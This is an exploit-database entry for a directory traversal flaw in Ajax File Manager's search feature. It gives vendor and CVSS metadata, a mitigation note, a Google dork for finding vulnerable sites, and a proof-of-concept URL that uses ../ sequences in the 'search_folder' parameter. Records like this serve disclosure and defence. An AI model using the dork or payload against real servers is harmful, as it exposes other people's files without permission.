Exploit Title: Ajax File Manager DirectoryTraversal

vendor:

Ajax File Manager

by:

Eduardo Alves (edudx9)

4,3

CVSS

MEDIUM

Directory Traversal

CWE

Product Name: Ajax File Manager

Affected Version From: All

Affected Version To: All

Patch Exists: YES

Related CWE: N/A

CPE: a:phpletter:ajax_file_manager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows/Linux

2014

Exploit Title: Ajax File Manager DirectoryTraversal

Ajax File/Image Manager is a l tool to manager files and images remotely. Without extra configs, it's possible to list files from another directory. The vulnerability it's related to 'search' function. In 'search_folder' parameter, escape with ../ or ..%2f

Mitigation:

Ensure that user-supplied input is validated and filtered before being used in a filesystem operation.

Source

Exploit-DB raw data:

# Exploit Title: Ajax File Manager  DirectoryTraversal
# Google Dork: inurl: "plugins/ajaxfilemanager"
# Date: 03/07/2014
# Exploit Author: Eduardo Alves (edudx9)
# Vendor Homepage: phpletter.com
# Software Link: http://phpletter.com/Demo/Ajax-File--Manager/
# Version: [app version - All
# Tested on: Windows/Linux


Ajax File/Image Manager is a l tool  to manager files and images remotely.
Without extra configs, it's possible to list files from another directory.

The vulnerability it's related to "search" function"

In "search_folder" parameter, escape with ../  or  ..%2f

PoF:

http://SERVER/PATH/ajaxfilemanager/ajax_get_file_listing.php?limit=10&view=thumbnail&search=1&search_name=&search_recursively=0&search_mtime_from=&search_mtime_to=&search_folder=../../../../../../../../home/phungv93/public_html/